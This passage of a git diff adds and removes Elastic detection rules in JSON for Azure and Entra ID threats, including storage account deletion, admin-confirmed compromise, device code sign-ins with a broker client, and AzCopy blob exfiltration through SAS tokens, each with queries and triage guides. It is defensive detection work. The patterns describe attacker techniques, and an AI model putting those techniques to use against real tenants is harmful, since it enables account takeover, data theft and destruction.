early detection of potential attacks.\n- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.\n", - "query": "event.dataset: \"azure.signinlogs\" and event.category: \"authentication\"\n and azure.signinlogs.properties.user_type: \"Member\"\n and not azure.signinlogs.properties.client_app_used: \"Browser\"\n and not source.as.organization.name: \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n", - "references": [ - "https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.client_app_used", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.user_type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.as.organization.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "9e11faee-fddb-11ef-8257-f661ea17fbcd", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "9e11faee-fddb-11ef-8257-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1.json new file mode 100644 index 00000000000..e31a22efc53 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when an Azure Storage Account is deleted. Adversaries may delete storage accounts to disrupt operations, destroy evidence, or cause denial of service. This activity could indicate an attacker attempting to cover their tracks after data exfiltration or as part of a destructive attack. Monitoring storage account deletions is critical for detecting potential impact on business operations and data availability.", + "false_positives": [ + "Storage administrators may legitimately delete storage accounts during decommissioning, resource cleanup, or infrastructure optimization. Verify that the deletion was expected and follows organizational change management processes. Consider exceptions for approved maintenance windows." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.activitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Storage Account Deletion by Unusual User", + "new_terms_fields": [ + "azure.activitylogs.identity.claims_initiated_by_user.name" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Storage Account Deletion by Unusual User\n\nAzure Storage Accounts provide scalable cloud storage for applications and services. Deletion of storage accounts is a high-impact operation that permanently removes all contained data including blobs, files, queues, and tables. Adversaries may delete storage accounts to destroy evidence of their activities, disrupt business operations, or cause denial of service as part of ransomware or destructive attacks. This detection monitors for successful storage account deletion operations to identify potential malicious activity.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal that initiated the storage account deletion by examining the principal ID, UPN and user agent fields.\n- Check the specific storage account name in `azure.resource.name` to understand which storage resources were deleted and assess the business impact.\n- Investigate the timing of the event to correlate with any other suspicious activities, such as unusual login patterns, privilege escalation attempts, or other resource deletions.\n- Examine the user's recent activity history to identify any other storage accounts or Azure resources that were deleted or modified by the same principal.\n- Verify if the storage account deletion aligns with approved change requests or maintenance windows in your organization.\n- Check if the deleted storage account contained critical data and whether backups are available for recovery.\n- Review any related alerts or activities such as data exfiltration, configuration changes, or access policy modifications that occurred before the deletion.\n- Investigate if the account was recently compromised by checking for suspicious authentication events or privilege escalations.\n\n### False positive analysis\n\n- Legitimate decommissioning of unused storage accounts may trigger this alert. Document approved storage account cleanup activities and coordinate with infrastructure teams to understand planned deletions.\n- DevOps automation tools might delete temporary storage accounts as part of infrastructure lifecycle management. Identify service principals used by CI/CD pipelines and consider creating exceptions for these automated processes.\n- Testing and development environments may have frequent storage account creation and deletion cycles. Consider filtering out non-production storage accounts if appropriate for your environment.\n- Cost optimization initiatives may involve deleting unused or redundant storage accounts. Coordinate with finance and infrastructure teams to understand planned resource optimization activities.\n\n### Response and remediation\n\n- Immediately investigate whether the deletion was authorized by verifying with the account owner or relevant stakeholders.\n- If the deletion was unauthorized, attempt to recover the storage account if soft-delete is enabled, or restore data from backups.\n- Disable the compromised user account or service principal if unauthorized activity is confirmed and investigate how the credentials were obtained.\n- Review and restrict Azure RBAC permissions to ensure only authorized users have storage account deletion capabilities (requires Contributor or Owner role).\n- Implement Azure Resource Locks to prevent accidental or malicious deletion of critical storage accounts.\n- Configure Azure Activity Log alerts to notify security teams immediately when storage accounts are deleted.\n- Conduct a full security assessment to identify any other compromised resources or accounts and look for indicators of broader compromise.\n- Document the incident and update security policies and procedures to prevent similar incidents in the future.\n", + "query": "event.dataset: azure.activitylogs and\n azure.activitylogs.operation_name: \"MICROSOFT.STORAGE/STORAGEACCOUNTS/DELETE\" and\n azure.activitylogs.identity.claims_initiated_by_user.name: *\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.identity.claims_initiated_by_user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + }, + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1.json new file mode 100644 index 00000000000..608c3788a79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when an administrator has manually confirmed a user or sign-in as compromised in Microsoft Entra ID Protection. This indicates that an administrator has reviewed the risk detection and determined that the user account or sign-in activity is definitively compromised. This is a high-confidence indicator of account compromise and should be investigated immediately.", + "false_positives": [ + "Administrators may mark accounts as compromised during security testing or incident response exercises. If this is expected behavior in your environment, consider adjusting the rule or adding exceptions for specific test accounts." + ], + "from": "now-9m", + "index": [ + "logs-azure.identity_protection-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "event.action", + "azure.identityprotection.properties.risk_detail", + "azure.identityprotection.properties.risk_level", + "azure.identityprotection.properties.risk_state", + "azure.identityprotection.properties.risk_event_type", + "azure.identityprotection.properties.risk_type", + "azure.identityprotection.properties.user_principal_name", + "azure.identityprotection.properties.user_display_name", + "azure.identityprotection.properties.user_id", + "azure.identityprotection.properties.ip_address", + "azure.identityprotection.properties.activity", + "azure.identityprotection.properties.additional_info", + "azure.identityprotection.properties.correlation_id", + "azure.correlation_id", + "source.ip" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "Entra ID Protection Admin Confirmed Compromise", + "note": "## Triage and analysis\n\nThis rule detects when an administrator has manually confirmed a user or sign-in as compromised in Microsoft Entra ID Protection. This is a critical security event that requires immediate investigation and response.\n\n### Possible investigation steps\n\n- Review the `azure.identityprotection.properties.risk_detail` field to determine if the compromise was confirmed at the sign-in level (`adminConfirmedSigninCompromised`) or user level (`adminConfirmedUserCompromised`).\n- Check the `azure.identityprotection.properties.user_principal_name` field to identify the compromised user account.\n- Review the `azure.identityprotection.properties.user_display_name` field for additional user identification information.\n- Examine the `azure.identityprotection.properties.risk_level` field to understand the severity level assigned to the risk event.\n- Check the `azure.identityprotection.properties.risk_state` field to verify the current state of the risk (should be confirmed as compromised).\n- Review the `azure.correlation_id` field to correlate this event with other related security events, including the original risk detections that led to the admin confirmation.\n- Investigate the timeline of events leading up to the admin confirmation by reviewing Entra ID sign-in logs and audit logs for the affected user.\n- Check for any suspicious activities associated with the user account, including:\n - Unusual sign-in locations or IP addresses\n - Access to sensitive resources or applications\n - Changes to user profile, permissions, or MFA settings\n - Bulk email sending or data exfiltration activities\n- Review the `azure.identityprotection.properties.additional_info` field for any additional context provided by the administrator or Entra ID Protection.\n- Identify which administrator confirmed the compromise by reviewing Entra ID audit logs for risk state changes.\n\n### False positive analysis\n\n- Security testing or penetration testing exercises may result in administrators confirming test accounts as compromised. If this is expected behavior, consider excluding specific test accounts or implementing a testing account naming convention to filter.\n- Incident response drills or tabletop exercises may involve marking accounts as compromised for training purposes. Coordinate with security teams to identify planned exercises.\n\n### Response and remediation\n\n- Immediately reset the password for the compromised user account and require the user to set a new password upon next sign-in.\n- Revoke all active sessions and authentication tokens for the compromised account, including:\n - Primary refresh tokens (PRTs)\n - OAuth tokens\n - Session cookies\n - Application-specific passwords\n- Review and revoke any suspicious OAuth consent grants or application permissions added by the compromised account.\n- Enable or enforce multi-factor authentication (MFA) for the affected user account if not already enabled.\n- Review all activities performed by the compromised account, including:\n - Email forwarding rules or inbox rules\n - File access and downloads\n - Changes to security settings or permissions\n - Creation of new users or service principals\n- Assess the scope of the compromise by identifying any lateral movement or privilege escalation activities.\n- Consider disabling the account temporarily until the investigation is complete and all remediation steps are verified.\n- Implement conditional access policies to prevent future compromises, such as requiring MFA from untrusted locations or blocking legacy authentication.\n- Review and strengthen identity protection policies and risk-based conditional access rules.\n- Document the incident, including the timeline, scope of compromise, and remediation actions taken.\n- Conduct a post-incident review to identify gaps in security controls and implement improvements to prevent similar incidents.\n", + "query": "event.dataset: azure.identity_protection and\n azure.identityprotection.properties.risk_detail: (\n \"adminConfirmedSigninCompromised\" or\n \"adminConfirmedUserCompromised\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-investigate-risk", + "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks", + "https://learn.microsoft.com/en-us/graph/api/resources/riskdetection" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.identityprotection.properties.risk_detail", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 99, + "rule_id": "a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890", + "setup": "#### Required Microsoft Entra ID Protection Logs\nTo use this rule, ensure that Microsoft Entra ID Protection logs are being collected and streamed into the Elastic Stack via the Azure integration.\n", + "severity": "critical", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Protection Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "a1b2c3d4-e5f6-7890-a1b2-c3d4e5f67890_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json deleted file mode 100644 index b1f686b083d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role.", - "false_positives": [ - "Sign-ins using PowerShell may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be signing into your environment. Sign-ins from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Active Directory PowerShell Sign-in", - "note": "## Triage and analysis\n\n### Investigating Azure Active Directory PowerShell Sign-in\n\nAzure Active Directory PowerShell for Graph (Azure AD PowerShell) is a module IT professionals commonly use to manage their Azure Active Directory. The cmdlets in the Azure AD PowerShell module enable you to retrieve data from the directory, create new objects in the directory, update existing objects, remove objects, as well as configure the directory and its features.\n\nThis rule identifies sign-ins that use the Azure Active Directory PowerShell module, which can indicate unauthorized access if done outside of IT or engineering.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to access Azure AD using PowerShell to complete its tasks.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the involved user account. Do they look normal?\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate suspicious actions taken by the user using the module, for example, modifications in security settings that weakens the security policy, persistence-related tasks, and data access.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding IT, Engineering, and other authorized users as exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.app_display_name:\"Azure Active Directory PowerShell\" and\n azure.signinlogs.properties.token_issuer_type:AzureAD and event.outcome:(success or Success)\n", - "references": [ - "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/", - "https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-microsoft-365-powershell?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.app_display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.token_issuer_type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "a605c51a-73ad-406d-bf3a-f24cc41d5c97", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "a605c51a-73ad-406d-bf3a-f24cc41d5c97_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a83b3dac-325a-11ef-b3e6-f661ea17fbce_2.json b/packages/security_detection_engine/kibana/security_rule/a83b3dac-325a-11ef-b3e6-f661ea17fbce_2.json deleted file mode 100644 index dc941f2b8e3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a83b3dac-325a-11ef-b3e6-f661ea17fbce_2.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e).", - "from": "now-9m", - "index": [ - "filebeat-*", - "logs-azure.signinlogs-*", - "logs-azure.activitylogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Entra ID Device Code Auth with Broker Client", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Entra ID Device Code Auth with Broker Client\n\nEntra ID Device Code Authentication allows users to authenticate devices using a code, facilitating seamless access to Azure resources. Adversaries exploit this by compromising Primary Refresh Tokens (PRTs) to bypass multi-factor authentication and Conditional Access policies. The detection rule identifies unauthorized access attempts by monitoring successful sign-ins using device code authentication linked to a specific broker client application ID, flagging potential misuse.\n\n### Possible investigation steps\n\n- Review the sign-in logs to confirm the use of device code authentication by checking the field azure.signinlogs.properties.authentication_protocol for the value deviceCode.\n- Verify the application ID involved in the sign-in attempt by examining azure.signinlogs.properties.conditional_access_audiences.application_id and ensure it matches 29d9ed98-a469-4536-ade2-f981bc1d605e.\n- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious.\n- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise.\n- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access.\n- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user.\n\n### False positive analysis\n\n- Legitimate device code authentication by trusted applications or users may trigger the rule. Review the application ID and user context to confirm legitimacy.\n- Frequent access by automated scripts or services using device code authentication can be mistaken for unauthorized access. Identify and document these services, then create exceptions for known application IDs.\n- Shared devices in environments with multiple users may cause false positives if device code authentication is used regularly. Implement user-specific logging to differentiate between legitimate and suspicious activities.\n- Regular maintenance or updates by IT teams using device code authentication might be flagged. Coordinate with IT to schedule these activities and temporarily adjust monitoring rules if necessary.\n- Ensure that any exceptions or exclusions are regularly reviewed and updated to reflect changes in the environment or application usage patterns.\n\n### Response and remediation\n\n- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions.\n- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid.\n- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse.\n- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts.\n- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats.\n- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event.", - "query": " event.dataset:(azure.activitylogs or azure.signinlogs)\n and azure.signinlogs.properties.authentication_protocol:deviceCode\n and azure.signinlogs.properties.conditional_access_audiences.application_id:29d9ed98-a469-4536-ade2-f981bc1d605e\n and event.outcome:success or (\n azure.activitylogs.properties.appId:29d9ed98-a469-4536-ade2-f981bc1d605e\n and azure.activitylogs.properties.authentication_protocol:deviceCode)\n", - "references": [ - "https://dirkjanm.io/assets/raw/Phishing%20the%20Phishing%20Resistant.pdf", - "https://learn.microsoft.com/en-us/troubleshoot/azure/entra/entra-id/governance/verify-first-party-apps-sign-in", - "https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/signinlogs" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.properties.appId", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.activitylogs.properties.authentication_protocol", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.authentication_protocol", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.conditional_access_audiences.application_id", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "a83b3dac-325a-11ef-b3e6-f661ea17fbce", - "setup": "This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected.\n", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 2 - }, - "id": "a83b3dac-325a-11ef-b3e6-f661ea17fbce_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1.json b/packages/security_detection_engine/kibana/security_rule/a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1.json new file mode 100644 index 00000000000..8c7363d917b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies successful GetBlob operations on Azure Storage Accounts using AzCopy user agent with SAS token authentication. AzCopy is a command-line utility for copying data to and from Azure Storage. While legitimate for data migration, adversaries may abuse AzCopy with compromised SAS tokens to exfiltrate data from Azure Storage Accounts. This rule detects the first occurrence of GetBlob operations from a specific storage account using this pattern.", + "false_positives": [ + "Legitimate data migration or backup operations using AzCopy with SAS tokens may trigger this rule.", + "Automated scripts or processes that use AzCopy for routine data transfers from Azure Storage Accounts.", + "DevOps or IT teams performing authorized data transfers or downloads from Azure Storage using AzCopy." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.platformlogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Storage Blob Retrieval via AzCopy", + "new_terms_fields": [ + "azure.platformlogs.properties.accountName" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Storage Blob Retrieval via AzCopy\n\nAzure Storage Accounts provide cloud storage services for blobs, files, queues, and tables. Shared Access Signatures (SAS) tokens provide delegated access to resources in a storage account with specific permissions and time constraints. AzCopy is a Microsoft command-line utility designed for efficient data transfers to and from Azure Storage. While AzCopy is a legitimate tool, adversaries may abuse it with compromised SAS tokens to exfiltrate data from Azure Storage Accounts.\n\n### Possible investigation steps\n- Review the `azure.platformlogs.properties.accountName` field to identify which storage account is being accessed and assess the sensitivity of data stored in that account.\n- Examine the `azure.platformlogs.properties.objectKey` field to identify the specific blob(s) being retrieved. Determine if the accessed files contain sensitive or confidential data.\n- Check the `source.address` field to identify the source IP address of the request. Investigate if this IP is unusual, unexpected, or originates from an unexpected network or geographic location.\n- Review the `azure.platformlogs.uri` field to examine the SAS token parameters, including:\n - `se` (expiry time): Check when the SAS token expires\n - `sp` (permissions): Verify what permissions were granted (e.g., \"rl\" for read and list)\n - `sv` (API version): Note the storage service version being used\n- Examine the `azure.platformlogs.identity.tokenHash` field to identify the specific SAS token signature being used. Correlate this with SAS token generation logs to determine when and how the token was created.\n- Check the `azure.platformlogs.properties.responseBodySize` field to assess the volume of data being downloaded. Multiple GetBlob operations with large response sizes may indicate bulk data exfiltration.\n- Search for related GetBlob operations from the same `source.address` or with the same `azure.platformlogs.identity.tokenHash` to identify patterns of systematic data retrieval.\n- Review Azure Activity Logs for recent SAS token generation events or storage account key access operations that may indicate how the adversary obtained the credentials.\n- Correlate this activity with ListBlobs or ListContainers operations from the same source, as adversaries often enumerate storage contents before exfiltration.\n- Investigate the `azure.resource.group` field to understand which resource group the storage account belongs to and check for any recent security events or configuration changes in that resource group.\n\n### False positive analysis\n- Routine data migration or backup operations using AzCopy with SAS tokens are common in enterprise environments. If this is expected behavior for the storage account, consider adding exceptions for specific accounts or IP ranges.\n- DevOps pipelines or automated workflows may use AzCopy with SAS tokens for legitimate data transfers. Review the automation configuration and add exceptions if appropriate.\n- Third-party services or partners may have authorized access to storage accounts using AzCopy and SAS tokens. Verify these relationships and create exceptions for known authorized sources.\n\n### Response and remediation\n- If unauthorized access is confirmed, immediately revoke the compromised SAS token to prevent further data exfiltration.\n- Review and rotate any additional SAS tokens that may have been compromised through the same attack vector.\n- Assess the scope of data accessed or exfiltrated during the unauthorized GetBlob operations and determine if sensitive data was compromised.\n- Implement additional monitoring and alerting for the affected storage account to detect any further suspicious activity.\n- Review and strengthen SAS token generation policies, including implementing shorter expiration times and more restrictive permissions.\n- Consider implementing Azure Storage firewall rules or private endpoints to restrict access to storage accounts from trusted networks only.\n- Investigate how the SAS token was compromised and remediate the initial access vector to prevent future incidents.\n- Document the incident and update security procedures to prevent similar compromises in the future.\n", + "query": "event.dataset: azure.platformlogs and\n event.action: GetBlob and\n azure.platformlogs.identity.type: SAS and\n azure.platformlogs.properties.userAgentHeader: AzCopy* and\n azure.platformlogs.statusCode: 200\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/", + "https://learn.microsoft.com/en-us/azure/storage/common/storage-use-azcopy-v10", + "https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview" + ], + "related_integrations": [ + { + "integration": "platformlogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.platformlogs.identity.type", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.platformlogs.properties.userAgentHeader", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.platformlogs.statusCode", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901", + "setup": "#### Required Azure Storage Diagnostic Logs\n\nTo ensure this rule functions correctly, the following diagnostic logs must be enabled for Azure Storage Accounts:\n- StorageRead: This log captures all read operations performed on blobs in the storage account, including GetBlob operations. These logs should be streamed to the Event Hub used for the Azure integration configuration.\n", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Storage", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + 